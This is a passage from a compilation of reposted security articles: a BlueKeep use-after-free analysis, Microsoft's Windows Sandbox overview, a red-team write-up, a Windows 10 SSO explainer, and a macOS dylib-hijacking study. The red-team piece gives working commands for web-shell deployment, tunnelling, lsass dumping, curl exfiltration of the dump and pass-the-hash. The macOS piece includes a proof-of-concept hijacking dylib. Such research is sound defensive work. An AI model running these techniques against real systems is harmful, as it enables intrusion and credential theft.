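    free(ref1);  /* we close the channel ourselves...                  */
    free(ref2);  /* ...then disconnect: the system frees it again.
                    Double free: undefined behavior; glibc typically
                    aborts with "double free or corruption".           */
    return 0;
}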
However, there is something better.

Internals of the channel cleanup code run when the connection is broken

Internally, the system creates the MS_T120 channel and binds it with ID 31. However, when it is bound using the vulnerable IcaBindVirtualChannels code, it is bound with another ID.

The difference in code pre and post patch

Essentially, the MS_T120 channel gets bound twice (once internally, then once by us). Because the channel is bound under two different IDs, we get two separate references to it. When one reference is used to close the channel, that reference is deleted, as is the channel; however, the other reference remains (known as a use-after-free). With the remaining reference, it is now possible to write to kernel memory which no longer belongs to us.

Sursa: https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html
16. Windows Sandbox
By Hari Pulapaka, Microsoft, 12-18-2018 04:18 PM

Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation.

How many times have you downloaded an executable file, but were afraid to run it? Have you ever been in a situation which required a clean installation of Windows, but didn't want to set up a virtual machine? At Microsoft we regularly encounter these situations, so we developed Windows Sandbox: an isolated, temporary desktop environment where you can run untrusted software without the fear of lasting impact to your PC. Any software installed in Windows Sandbox stays only in the sandbox and cannot affect your host. Once Windows Sandbox is closed, all the software, with all its files and state, is permanently deleted.

Windows Sandbox has the following properties:
Part of Windows – everything required for this feature ships with Windows 10 Pro and Enterprise. No need to download a VHD!
Pristine – every time Windows Sandbox runs, it's as clean as a brand-new installation of Windows
Disposable – nothing persists on the device; everything is discarded after you close the application
Secure – uses hardware-based virtualization for kernel isolation, relying on Microsoft's hypervisor to run a separate kernel which isolates Windows Sandbox from the host
Efficient – uses the integrated kernel scheduler, smart memory management, and a virtual GPU

Prerequisites for using the feature:
Windows 10 Pro or Enterprise, Insider build 18305 or later
AMD64 architecture
Virtualization capabilities enabled in BIOS
At least 4GB of RAM (8GB recommended)
At least 1GB of free disk space (SSD recommended)
At least 2 CPU cores (4 cores with hyperthreading recommended)

Quick start:
1. Install Windows 10 Pro or Enterprise, Insider build 18305 or newer.
2. Enable virtualization: if you are using a physical machine, ensure virtualization capabilities are enabled in the BIOS. If you are using a virtual machine, enable nested virtualization with this PowerShell cmdlet:
Set-VMProcessor -VMName <VMName> -ExposeVirtualizationExtensions $true
3. Open Windows Features, and then select Windows Sandbox. Select OK to install Windows Sandbox. You might be asked to restart the computer.
4. Using the Start menu, find Windows Sandbox, run it and allow the elevation.
5. Copy an executable file from the host.
6. Paste the executable file into the window of Windows Sandbox (on the Windows desktop).
7. Run the executable in Windows Sandbox; if it is an installer, go ahead and install it.
8. Run the application and use it as you normally do.
9. When you're done experimenting, simply close the Windows Sandbox application. All sandbox content will be discarded and permanently deleted.
10. Confirm that the host does not have any of the modifications that you made in Windows Sandbox.

Windows Sandbox respects the host diagnostic data settings. All other privacy settings are set to their default values.

Windows Sandbox internals
Since this is the Windows Kernel Internals blog, let's go under the hood. Windows Sandbox builds on the technologies used within Windows Containers. Windows containers were designed to run in the cloud; we took that technology, added integration with Windows 10, and built features that make it more suitable to run on devices and laptops without requiring the full power of Windows Server.
Some of the key enhancements we have made include:

Dynamically generated image
At its core Windows Sandbox is a lightweight virtual machine, so it needs an operating system image to boot from. One of the key enhancements we have made for Windows Sandbox is the ability to use a copy of the Windows 10 installed on your computer, instead of downloading a new VHD image as you would have to do with an ordinary virtual machine. We want to always present a clean environment, but the challenge is that some operating system files can change. Our solution is to construct what we refer to as a "dynamic base image": an operating system image that has clean copies of files that can change, but links to files that cannot change and that are in the Windows image which already exists on the host. The majority of the files are links (immutable files), which is why the image is so small (~100MB) for a full operating system. We call this instance the "base image" for Windows Sandbox, using Windows Container parlance. When Windows Sandbox is not installed, we keep the dynamic base image in a compressed package which is only 25MB; once installed, the dynamic base package occupies about 100MB of disk space.

Smart memory management
Memory management is another area where we have integrated with the Windows kernel. Microsoft's hypervisor allows a single physical machine to be carved up into multiple virtual machines which share the same physical hardware. While that approach works well for traditional server workloads, it isn't as well suited to running on devices with more limited resources. We designed Windows Sandbox in such a way that the host can reclaim memory from the sandbox if needed. Additionally, since Windows Sandbox is basically running the same operating system image as the host, we also allow Windows Sandbox to use the same physical memory pages as the host for operating system binaries, via a technology we refer to as "direct map". In other words, the same executable pages of ntdll are mapped into the sandbox as those on the host. We take care to ensure this is done in a secure manner and no secrets are shared.

Integrated kernel scheduler
With ordinary virtual machines, Microsoft's hypervisor controls the scheduling of the virtual processors running in the VMs. However, for Windows Sandbox we use a new technology called the "integrated scheduler", which allows the host to decide when the sandbox runs. For Windows Sandbox we employ a unique scheduling policy that allows the virtual processors of the sandbox to be scheduled in the same way as threads would be scheduled for a process. High-priority tasks on the host can preempt less important work in the sandbox. The benefit of using the integrated scheduler is that the host manages Windows Sandbox as a process rather than a virtual machine, which results in a much more responsive host, similar to Linux KVM. The whole goal here is to treat the sandbox like an app, but with the security guarantees of a virtual machine.

Snapshot and clone
As stated above, Windows Sandbox uses Microsoft's hypervisor. We're essentially running another copy of Windows which needs to be booted, and this can take some time. So rather than paying the full cost of booting the sandbox operating system every time we start Windows Sandbox, we use two other technologies: "snapshot" and "clone". Snapshot allows us to boot the sandbox environment once and preserve the memory, CPU, and device state to disk.
Then we can restore the sandbox environment from disk and put it into memory, rather than booting it, whenever we need a new instance of Windows Sandbox. This significantly improves the start time of Windows Sandbox.

Graphics virtualization
Hardware-accelerated rendering is key to a smooth and responsive user experience, especially for graphics-intense or media-heavy use cases. However, virtual machines are isolated from their hosts and unable to access advanced devices like GPUs. The role of graphics virtualization technologies, therefore, is to bridge this gap and provide hardware acceleration in virtualized environments, e.g. Microsoft RemoteFX. More recently, Microsoft has worked with our graphics ecosystem partners to integrate modern graphics virtualization capabilities directly into DirectX and WDDM, the driver model used by display drivers on Windows. At a high level, this form of graphics virtualization works as follows:
Apps running in a Hyper-V VM use graphics APIs as normal.
Graphics components in the VM, which have been enlightened to support virtualization, coordinate across the VM boundary with the host to execute graphics workloads.
The host allocates and schedules graphics resources among apps in the VM alongside the apps running natively. Conceptually they behave as one pool of graphics clients.
This process is illustrated below.

This enables the Windows Sandbox VM to benefit from hardware-accelerated rendering, with Windows dynamically allocating graphics resources where they are needed across the host and guest. The result is improved performance and responsiveness for apps running in Windows Sandbox, as well as improved battery life for graphics-heavy use cases. To take advantage of these benefits, you'll need a system with a compatible GPU and graphics drivers (WDDM 2.5 or newer). Incompatible systems will render apps in Windows Sandbox with Microsoft's CPU-based rendering technology.

Battery pass-through
Windows Sandbox is also aware of the host's battery state, which allows it to optimize power consumption. This is critical for a technology that will be used on laptops, where not wasting battery is important to the user.

Filing bugs and suggestions
As with any new technology, there may be bugs. Please file them so that we can continually improve this feature. File bugs and suggestions at Windows Sandbox's Feedback Hub (select Add new feedback), or follow these steps:
1. Open the Feedback Hub.
2. Select Report a problem or Suggest a feature.
3. Fill in the Summarize your feedback and Explain in more detail boxes with a detailed description of the issue or suggestion.
4. Select an appropriate category and subcategory by using the dropdown menus. There is a dedicated option in Feedback Hub to file "Windows Sandbox" bugs and feedback; it is located under "Security and Privacy", subcategory "Windows Sandbox".
5. Select Next.
6. If necessary, you can collect traces for the issue as follows: select the Recreate my problem tile, then select Start capture, reproduce the issue, and then select Stop capture.
7. Attach any relevant screenshots or files for the problem.
8. Submit.

Conclusion
We look forward to you using this feature and receiving your feedback!

Cheers,
Hari Pulapaka, Margarit Chenchev, Erick Smith, & Paul Bozzay (Windows Sandbox team)

Sursa: https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/Windows-Sandbox/ba-p/301849
17. Exploiting Un-attended Web Servers To Get Domain Admin – Red Teaming
MAY 31, 2019 | BY MUKUNDA KRISHNA | CYBER SECURITY, ENTERPRISE SECURITY, RED TEAM

Note: Images used are all recreated to redact actual target information.

Recently, we conducted a remote red team assessment on a large organization and its child companies. This organization was particularly concerned about the security posture of its assets online. It had multiple child companies working with it, as well as third-party organizations working on-premise and remotely to develop new products. The objective was to compromise the domain from their online assets. While we want this blog to focus on the technical side of how we compromised their network, we also want to point out a few mistakes that large organizations usually make.

TIP: It is easy to lose your way during reconnaissance when the scope is huge and little time is involved. To avoid getting lost, keep track of everything you performed and found, and of what is vulnerable, in one place.

In reconnaissance, we identified a few Apache Tomcat servers (mostly v7.0.70) running on the target organization's owned range of IP addresses that seemed interesting. We sprayed a few common credentials at these web servers and successfully logged in to one of them. Later, we came to know that this server was being used by one of the child organizations so that remote developers could debug applications. Upon logging in, we learned that Tomcat was running on Windows Server 2012 R2.

Now, the easiest way to get command execution would be to upload a JSP web shell to the host server. We used a simple JSP web shell from Security Risk Advisors, cmd.jsp, to execute commands on the host server. Since Tomcat allows deploying web apps in "war" format, we generated a .war file with `jar -cvf example.war cmd.jsp` to blend in with the default web apps. After uploading the web shell, we immediately copied the existing web shell to examples/jsp/images/somerandomname.jsp to avoid detection and obvious directory brute forcing. We then removed the previously uploaded web shell by un-deploying it.

Now that we had command execution and file upload capabilities on the host server, we began enumerating it for more information, such as the user name, current user privileges, currently logged-in users, host patch level, anti-malware services running on the host, host uptime, firewall rules, proxy settings, domain admins, etc. The next objective was to gather as much information as possible about the target machine; below is the gathered information:
Windows 2012 R2 virtual machine inside the target domain
Newly launched Tomcat service running with the privileges of a domain user who is also a member of the BUILTIN\Administrators group
Latest security patches
RDP enabled
Daily user activity
No SSH
Armed with System Center Endpoint Protection and Trend Micro Deep Security

A SYSVOL search for credentials didn't yield satisfactory results. While we had administrative privileges on the host, the web shell's interactivity was very limited. The immediate goal was to gain a better foothold on the target host by following either of the methods below:
1. Drop an agent on the disk which slips past a multi-layered firewall, DPI and SOC team monitoring, and connects back to us with a shell; or
2. Use the web application server to tunnel traffic to the target host over HTTPS and reach the internal host's services like RDP, SMB and other web applications running on the target host
(start a bind shell on the localhost of the target host by dropping "nc.exe", connect to it, and get a shell)

As 1337 as it sounds, option 1 is not always the go-to option, especially when there are heavy egress restrictions and obstacles and you have relatively limited time to complete an assessment. Tunnelling, on the other hand, is much quicker; while there is the caveat of additional work to get a shell, advantages like service interaction overshadow this caveat by a large margin. To achieve tunnelling, we used "A Black Path Toward The Sun" (ABPTTS) by Ben Lincoln from NCC Group. You can find it here. Ben has done a great job describing the tool and how you can use it in situations like these; we recommend reading the manual before proceeding further. The following is a typical way of tunnelling via ABPTTS:

1. Generate a server-side JSP file with the default configuration:
python abpttsfactory.py -o tomcat_walkthrough

2. Generate the war format of the JSP file:
jar -cvf tunnel.war abptts.jsp

3. Upload the war file.

4. On the attack host, set the ABPTTS client to forward all of the attack host's localhost traffic on port 3389 to the target host's port 3389:
python abpttsclient.py -c tomcat_walkthrough/config.txt -u <url-of-uploaded-jsp-server-file> -f 127.0.0.1:3389/127.0.0.1:3389

5. On the attack host, run:
rdesktop 127.0.0.1

Similar to the above scenario, we obtained internal service interaction with the target host. Since we had local administrator privileges, from the web shell we added a new local user on the machine and added the new user to the Administrators and Remote Desktop Users groups. Everything was obvious from here: now we could log in as a high-privileged local user using RDP via tunnelling. While we didn't have access to the domain yet, this was already a huge win.

The next step was to use the resources at hand to gain access to the domain. A typical procedure is to find credentials in the network or on the local system. While the SYSVOL search was a let-down, we could still extract credentials from the target host (the one compromised earlier). For this, we used Sysinternals' "procdump.exe" to extract the memory contents of lsass.exe and feed them to Mimikatz. We uploaded procdump to the target host and moved it to the newly created user's desktop. Procdump requires administrator privileges to run, so we opened cmd as an administrator and ran procdump with:
procdump.exe -accepteula -ma lsass.exe lsass.dmp

Now comes the tricky part: exfiltrating the dmp file, which was well over 50MB. We used fuzzdb's list.jsp in combination with curl to exfiltrate the file from the web server. list.jsp is a directory and file viewer from fuzzdb; you can find it here. We generated a war and deployed it on the Tomcat server, navigated to where the lsass dump was, and copied the URL. Then, on the attacking host, using curl, we ran:
curl --insecure https://targethost/examples/images/jsp/list.jsp?file=c:/Users/Administrator/Contacts/lsass.dmp --output lsass.dmp

We then fed the lsass dump file to our Windows instance running Mimikatz. We found over 6-7 domain user NTLM hashes and one NTLM hash of a domain admin who had recently logged in. Checkmate. No unexpected twists, no drama. We then used Invoke-SMBExec from here to pass the hash and get a shell, by running:
Import-Module Invoke-SMBExec.ps1
Invoke-SMBExec -Target dc.domain.com -Domain domain.com -Username grantmepower -Hash <ntlm hash>

When we updated the target organization about this, they asked us to end it here.
To conclude this post, we would like to advise organizations with a large footprint on the internet that expensive network security devices, anti-malware software and 24/7 monitoring aren't enough to protect internal networks, especially when you leave domain member servers wide open to the internet with weak credentials and expect adversaries to knock on your front door first. That said, these are the takeaways for the organization:
Keep track of servers, especially domain servers, which are being used to develop products.
Do not deploy servers without checking for weak credentials.
There was no reason for the domain user to be a local administrator on that server.
There is no need for a user belonging to the domain admins group to log in to any domain machine to perform daily administrative tasks. Always delegate control and follow the least-privilege model.
Frequent password rotation for high-privileged users helps.

Credits – Mukunda – https://twitter.com/_m3rcii Manideep – https://twitter.com/mani0x00

Sursa: https://wesecureapp.com/2019/05/31/exploiting-un-attended-web-servers-to-get-domain-admin-red-teaming/
18. How SSO works in Windows 10 devices
Posted on November 8, 2016 by Jairo

In a previous post I talked about the three ways to set up Windows 10 devices for work with Azure AD. I later covered in detail how Azure AD Join and auto-registration to Azure AD of Windows 10 domain joined devices work, and in an extra post I explained how Windows Hello for Business (a.k.a. Microsoft Passport for Work) works. In this post I will cover how Single Sign-On (SSO) works once devices are registered with Azure AD, whether domain joined, Azure AD joined, or personal devices registered via Add Work or School Account.

SSO in Windows 10 works for the following types of applications:
Azure AD connected applications, including Office 365, SaaS apps, applications published through the Azure AD application proxy, and LOB custom applications integrating with Azure AD.
Windows Integrated authentication apps and services.
AD FS applications, when using AD FS in Windows Server 2016.

The Primary Refresh Token
SSO relies on special tokens obtained for each of the types of applications above, which are in turn used to obtain access tokens for specific applications. In the traditional Windows Integrated authentication case using Kerberos, this token is a Kerberos TGT (ticket-granting ticket). For Azure AD and AD FS applications we call it a Primary Refresh Token (PRT): a JSON Web Token containing claims about both the user and the device.

The PRT is initially obtained during Windows logon (user sign-in/unlock) in a similar way to how the Kerberos TGT is obtained. This is true for both Azure AD joined and domain joined devices. On personal devices registered with Azure AD, the PRT is initially obtained upon Add Work or School Account (on a personal device the account used to unlock the device is not the work account but a consumer account, e.g. hotmail.com, live.com, outlook.com, etc.).

The PRT is needed for SSO. Without it, the user will be prompted for credentials every time they access applications. Please also note that the PRT contains information about the device. This means that if you have any device-based conditional access policy set on an application, access will be denied without the PRT.

PRT validity
The PRT is valid for 90 days, with a 14-day sliding window. If the PRT is constantly used for obtaining tokens to access applications, it will be valid for the full 90 days; after 90 days it expires and a new PRT needs to be obtained. If the PRT has not been used for a period of 14 days, it expires and a new one needs to be obtained. Conditions that force expiration of the PRT outside of these windows include events like a user's password change/reset.

For domain joined and Azure AD joined devices, renewal of the PRT is attempted every 4 hours. This means that on the first sign-in/unlock 4 hours after the PRT was obtained, an attempt is made to obtain a new PRT. Now, there is a caveat for domain joined devices: attempting to get a new PRT only happens if the device has line of sight to a DC (for a Kerberos full network logon, which also triggers the Azure AD logon). This is a behavior we want to change and hope to address in the next update of Windows; the change would mean that the PRT can be updated even when the user goes off the corporate network. The implication of today's behavior is that a domain joined device needs to come onto the corporate network (either physically or via VPN) at least once every 14 days.
Domain joined/Azure AD joined devices and SSO
The following step-by-step shows how the PRT is obtained and how it is used for SSO. The diagram shows the flow in parallel with the long-standing Windows Integrated authentication flow, for reference and comparison.

(1) User enters credentials in the Windows logon UI
In the Windows logon UI the user enters credentials to sign in to or unlock the device. The credentials are obtained by a credential provider: if using username and password, the credential provider for username and password is used; if using Windows Hello for Business (PIN or bio-gesture), the credential provider for PIN, fingerprint or face recognition is used.

(2) Credentials are passed to the Cloud AP Azure AD plug-in for authentication
The credential provider gets the credentials to WinLogon, which calls the LsaLogonUser() API with the user credentials (to learn about the authentication architecture in Windows, see Credentials Processes in Windows Authentication). The credentials reach a new component in Windows 10 called the Cloud Authentication Provider (Cloud AP). This is a plug-in based component running inside the LSASS (Local Security Authority Subsystem) process, one plug-in being the Azure AD Cloud AP plug-in; for simplicity, in the diagram these two are shown as one Cloud AP box. The plug-in authenticates the user against Azure AD and AD FS (if Windows Server 2016) to obtain the PRT. The plug-in knows about the Azure AD tenant and the presence of AD FS from the information cached at device registration time. I explain this at the end of step #2 in the post Azure AD Join: what happens behind the scenes?, where the information from the ID token is obtained and cached just before performing registration (the explanation applies both to domain joined devices registered with Azure AD and to Azure AD joined devices).

(3) Authentication of user and device to get the PRT from Azure AD (and AD FS if federated, with Windows Server 2016)
Depending on what credentials are used, the plug-in obtains the PRT via distinct calls to Azure AD and AD FS.

PRT based on username and password
To obtain the Azure AD PRT using username and password, the plug-in sends the credentials directly to Azure AD (in a non-federated configuration) or to AD FS (if federated). In the federated case, the plug-in sends the credentials to the following WS-Trust endpoint in AD FS to obtain a SAML token that is then sent to Azure AD:

adfs/services/trust/13/usernamemixed

Note: This post has been updated to reflect that the endpoint used is usernamemixed and not windowstransport as previously stated.

Azure AD authenticates the user with the credentials obtained (non-federated) or by verifying the SAML token obtained from AD FS (federated). After authentication, Azure AD builds a PRT with both user and device claims and returns it to Windows.

PRT based on the Windows Hello for Business credential
To obtain the Azure AD PRT using the Windows Hello for Business credential, the plug-in sends a message to Azure AD, which responds with a nonce. The plug-in replies with the nonce signed with the Windows Hello for Business credential key. Azure AD authenticates the user by checking the signature against the public key that it registered at credential provisioning, as explained in the post Azure AD and Microsoft Passport for Work in Windows 10 (please note that Windows Hello for Business is the new name for Microsoft Passport for Work).
The PRT will contain information about the user and the device as well; however, one difference from the PRT obtained using username and password is that this one will contain a "strong authentication" claim:

"acr":"2"

Regardless of how the PRT was obtained, a session key is included in the response, encrypted to the Kstk (one of the keys provisioned during device registration, as explained in step #4 of the post Azure AD Join: what happens behind the scenes?). The session key is decrypted by the plug-in and imported into the TPM using the Kstk. Upon re-authentication, the PRT is sent over to Azure AD signed using a derived version of the previously imported session key stored in the TPM, which Azure AD can verify. This way we bind the PRT to the physical device, reducing the risk of PRT theft.

(4) Caching of the PRT for the Web Account Manager to access during app authentication
Once the PRT is obtained, it is cached in the Local Security Authority (LSA). It is accessible by the Web Account Manager, which is also a plug-in based component that provides an API for applications to get tokens from a given identity provider (IdP). It can access the PRT through the Cloud AP (which has access to the PRT), which checks for a particular application identifier belonging to the Web Account Manager. There is a plug-in for the Web Account Manager that implements the logic to obtain tokens from Azure AD and AD FS (if AD FS in Windows Server 2016).

You can see whether a PRT was obtained after sign-in/unlock by checking the output of the following command:

dsregcmd.exe /status

Under the 'User State' section, check the value of AzureAdPrt, which must be YES. A value of NO indicates that no PRT was obtained: the user won't have SSO and will be blocked from accessing service applications that are protected using a device-based conditional access policy.

A note on troubleshooting
Troubleshooting why the PRT is not obtained could be a topic for a full post; however, one test you can do is to check whether the same user can authenticate to Office 365 (say, via browser to SharePoint Online) from a domain joined computer without being prompted for credentials. If the UPN suffixes of users in Active Directory on-premises don't route to the verified domain (alternate login ID), please make sure you have the appropriate issuance transform rule(s) in AD FS for the ImmutableID claim. One other reason I have seen for the PRT not being obtained is when the device has a bad transport key (Kstk). I have seen this on devices that were registered with a very early version of Windows (and eventually upgraded to 1607). As the PRT is protected using a key in the TPM, this could be a reason why the PRT is not obtained at all. One remediation for this case is to reset the TPM and let the device register again.

(5, 6 and 7) Application requests an access token from the Web Account Manager for a given application service
When a client application connects to a service application that relies on Azure AD for authentication (for example, the Outlook app connecting to Office 365 Exchange Online), the application requests a token from the Web Account Manager using its API. The Web Account Manager calls the Azure AD plug-in, which in turn uses the PRT to obtain an access token for the service application in question (5). There are two interfaces in particular that are important to note: one permits an application to get a token silently, using the PRT to obtain an access token silently if it can.
If it can't, it returns a code to the caller application telling it that UI interaction is required. This can happen for multiple reasons, including an expired PRT or MFA authentication being required for the user. Once the caller application receives this code, it can call a separate API that displays a web control for the user to interact with.

WinRT API
WebAuthenticationCoreManager.GetTokenSilentlyAsync(...) // Silent API
WebAuthenticationCoreManager.RequestTokenAsync(...) // User interaction API

Win32 API
IWebAuthenticationCoreManagerStatics::GetTokenSilentlyAsync(...) // Silent API
IWebAuthenticationCoreManagerInterop::RequestTokenForWindowAsync(...) // UI API

After the access token is returned to the application (6), the client application uses it to get access to the service application (7).

Browser SSO
When the user accesses a service application via Microsoft Edge or Internet Explorer, the application redirects the browser to the Azure AD authentication URL. At this point, the request is intercepted via URLMON and the PRT is included in the request. After authentication succeeds, Azure AD sends back a cookie that contains SSO information for future requests. Please note that support for Google Chrome has been available since the Creators Update of Windows 10 (version 1703), via the Windows 10 Accounts Google Chrome extension.

Note: This post has been updated to state the support for Google Chrome in Windows 10.

Final thoughts
Remember that registering your domain joined computers with Azure AD (i.e. becoming Hybrid Azure AD joined) will give you instant benefits, and it is likely you have everything you need to do it. Also, if you are thinking of deploying Azure AD joined devices, you will start enjoying some additional benefits that come with them. Please let me know your thoughts and stay tuned for other posts related to device-based conditional access and other related topics.

See you soon,
Jairo Cadena (Twitter: @JairoC_AzureAD)

Sursa: https://jairocadena.com/2016/11/08/how-sso-works-in-windows-10-devices/
  19. macOS - Getting root with benign AppStore apps
June 1, 2019 · 24 minutes read · BLOG · macos • vulnerability • lpe
This writeup is intended to be a bit of storytelling. I would like to show how I went down the rabbit hole in a quick 'research' I wanted to do, and how I eventually found a local privilege escalation vulnerability in macOS. I also want to tell about all the obstacles and failures I ran into - stuff people don't usually talk about, but which I feel is part of the process all of us go through when we try to create something.
If you prefer to watch this as a talk, you can see it here: Csaba Fitzl - macOS: Gaining root with Harmless AppStore Apps - SecurityFest 2019 - YouTube
Slides are here: Getting root with benign app store apps
DYLIB Hijacking on macOS
This entire story started with me trying to find a dylib hijacking vulnerability in a specific application, which I can't name here. Well, I didn't find any in that app, but found plenty in many others. If you are not familiar with dylib hijacking on macOS, read Patrick Wardle's great writeup: Virus Bulletin :: Dylib hijacking on OS X or watch his talk on the subject: DEF CON 23 - Patrick Wardle - DLL Hijacking on OS X - YouTube
I would go for the talk, as he is a great presenter and will explain the subject in a very user friendly way, so you will understand all the details. But just to sum it up very briefly, there are two types of dylib hijacking possible:
1. weak loading of dylibs - in this case the binary references the dylib through an LC_LOAD_WEAK_DYLIB load command, and if the dylib is not found the application will still run and won't error out. So if there is an app that refers to a missing dylib with this method, you can go ahead, place yours there, and profit.
2. rpath (run-path dependent) dylibs - in this case the dylibs are referenced with the @rpath prefix, which is resolved relative to the current location of the running Mach-O file, and the loader will try to find the dylib based on the embedded search paths. This is useful if you don't know where your app will end up after installation. Developers can specify multiple search paths, and if the dylib doesn't exist in the first one (or the first couple), you can place your malicious dylib there, as the loader searches these paths in sequential order. In its logic this is similar to classic DLL hijacking on Windows.
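As a quick aside (this helper is my illustration, not part of the original post): otool -l prints every load command of a binary, so you can list its LC_RPATH and LC_LOAD_WEAK_DYLIB entries to spot hijack candidates. The default path below is just a placeholder:

import subprocess, sys

# Print LC_RPATH and LC_LOAD_WEAK_DYLIB entries of a Mach-O binary,
# parsed from `otool -l` output.
binary = sys.argv[1] if len(sys.argv) > 1 else "/Applications/Example.app/Contents/MacOS/Example"
out = subprocess.run(["otool", "-l", binary], capture_output=True, text=True).stdout

cmd = None
for raw in out.splitlines():
    line = raw.strip()
    if line.startswith("cmd "):
        cmd = line.split()[1]  # e.g. LC_RPATH, LC_LOAD_WEAK_DYLIB
    elif cmd in ("LC_RPATH", "LC_LOAD_WEAK_DYLIB") and line.startswith(("path ", "name ")):
        # lines look like: "path @loader_path/../Frameworks (offset 12)"
        print(cmd, "->", line.split(None, 1)[1].rsplit(" (offset", 1)[0])
        cmd = None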
Finding vulnerable apps
It couldn't be easier: you go download Patrick's DHS tool, run the scan, and wait. Link: Objective-See
There is also a command line version: GitHub - synack/DylibHijack: python utilities related to dylib hijacking on OS X
For the walkthrough I will use the Tresorit app as an example, as they already fixed the problem - and big kudos to them, as they not only responded but also fixed this within a couple of days of my report. I will not mention all of the apps here, but you would be amazed how many are out there.
The vulnerability is with Tresorit's FinderExtension:
/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension
And you can place your dylib here:
rpath vulnerability: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/Frameworks/UtilsMac.framework/Versions/A/UtilsMac
DHS will only show you the first hijackable dylib, but there can be more. Set the DYLD_PRINT_RPATHS variable to 1 in Terminal, and you will see which dylibs the loader tries to load. You can see below that we can hijack two dylibs.
$ export DYLD_PRINT_RPATHS="1"
$
$ /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension
RPATH failed to expanding @rpath/UtilsMac.framework/Versions/A/UtilsMac to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../Frameworks/UtilsMac.framework/Versions/A/UtilsMac
RPATH successful expansion of @rpath/UtilsMac.framework/Versions/A/UtilsMac to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac
RPATH failed to expanding @rpath/MMWormhole.framework/Versions/A/MMWormhole to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../Frameworks/MMWormhole.framework/Versions/A/MMWormhole
RPATH successful expansion of @rpath/MMWormhole.framework/Versions/A/MMWormhole to: /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/MMWormhole.framework/Versions/A/MMWormhole
Illegal instruction: 4
$
Additionally, it's a good idea to double check whether the app is compiled with the library-validation option (flag=0x200). That would mean the OS verifies the signature of every dylib being loaded, so you can't just create anything and use it. Most apps are not compiled this way, including Tresorit (but they promised to fix it):
$ codesign -dvvv /Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension
Executable=/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/FinderExtension
Identifier=com.tresorit.mac.TresoritExtension.FinderExtension
Format=bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=754 flags=0x0(none) hashes=15+5 location=embedded
(...)
Utilizing the vulnerability
This is also something that is super easy based on the talk above, but here it is in short. I made the following POC:
#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>

__attribute__((constructor))
void customConstructor(int argc, const char **argv) {
    printf("Hello World!\n");
    system("/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal");
    syslog(LOG_ERR, "Dylib hijack successful in %s\n", argv[0]);
}
The constructor will be called upon loading the dylib. It will print a line, create a syslog entry, and also start Terminal for you. If the app doesn't run in a sandbox, you get a full featured Terminal.
Compile it:
gcc -dynamiclib hello.c -o hello-tresorit.dylib -Wl,-reexport_library,"/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac"
Then run Patrick's fixer script. It will fix the dylib version for you (the dylib loader verifies that when loading) and also add all the exports that are exported by the original dylib. Those exports will actually point to the valid dylib, so when the application loads our crafted version, it can still use all the functions and won't crash.
python2 createHijacker.py hello-tresorit.dylib "/Applications/Tresorit.app/Contents/MacOS/TresoritExtension.app/Contents/PlugIns/FinderExtension.appex/Contents/MacOS/../../../../Frameworks/UtilsMac.framework/Versions/A/UtilsMac"
CREATE A HIJACKER (p. wardle)
configures an attacker supplied .dylib to be compatible with a target hijackable .dylib
[+] configuring hello-tresorit.dylib to hijack UtilsMac
[+] parsing 'UtilsMac' to extract version info
found 'LC_ID_DYLIB' load command at offset(s): [2568]
extracted current version: 0x10000
extracted compatibility version: 0x10000
[+] parsing 'hello-tresorit.dylib' to find version info
found 'LC_ID_DYLIB' load command at offset(s): [888]
[+] updating version info in hello-tresorit.dylib to match UtilsMac
setting version info at offset 888
[+] parsing 'hello-tresorit.dylib' to extract faux re-export info
found 'LC_REEXPORT_DYLIB' load command at offset(s): [1144]
extracted LC command size: 0x48
extracted path offset: 0x18
computed path size: 0x30
extracted faux path: @rpath/UtilsMac.framework/Versions/A/UtilsMac
[+] updating embedded re-export via exec'ing: /usr/bin/install_name_tool -change
[+] copying configured .dylib to /Users/csaby/Downloads/DylibHijack/UtilsMac
Once that is done, you can just copy the file over and start the app.
Other apps
Considering the amount of vulnerable apps, I didn't even take the time to report all of these issues, only a few. Besides Tresorit, I reported one to Avira, who promised a fix, but with low priority, as you had to have root to utilise it. The others were in MS Office 2016, where Microsoft said they don't consider this a security bug since you need root privileges to exploit it; they said I could submit it as a product bug. I don't agree, because this is a way to achieve persistence, but I suppose I have to live with it.
The privilege problem
My original 'research' was done, but this is the point where I went beyond what I expected in the beginning. There is a problem in the case of many apps: in theory you just need to drop your dylib into the right place, but there are two main scenarios in terms of the privileges required to utilise the vulnerability.
The application folder is owned by your account (in reality everyone is admin on his Mac, so I won't deal with standard users here) - in that case you can go and drop your files easily.
The application folder is owned by root, so you need root privileges in order to perform the attack. Honestly this kinda makes it less interesting, because if you can get root, you can do much better persistence elsewhere, and the app will typically run in a sandbox and under the user's privileges, so you won't get too much out of it. It's still a problem, but a less interesting one.
Typically, applications you drag and drop into the /Applications directory will fall into the first category. All applications from the App Store will fall into the second category, because they are installed by the installd daemon, which runs as root. Apps that you install from a package will typically also fall into the second category, as those usually require privilege elevation.
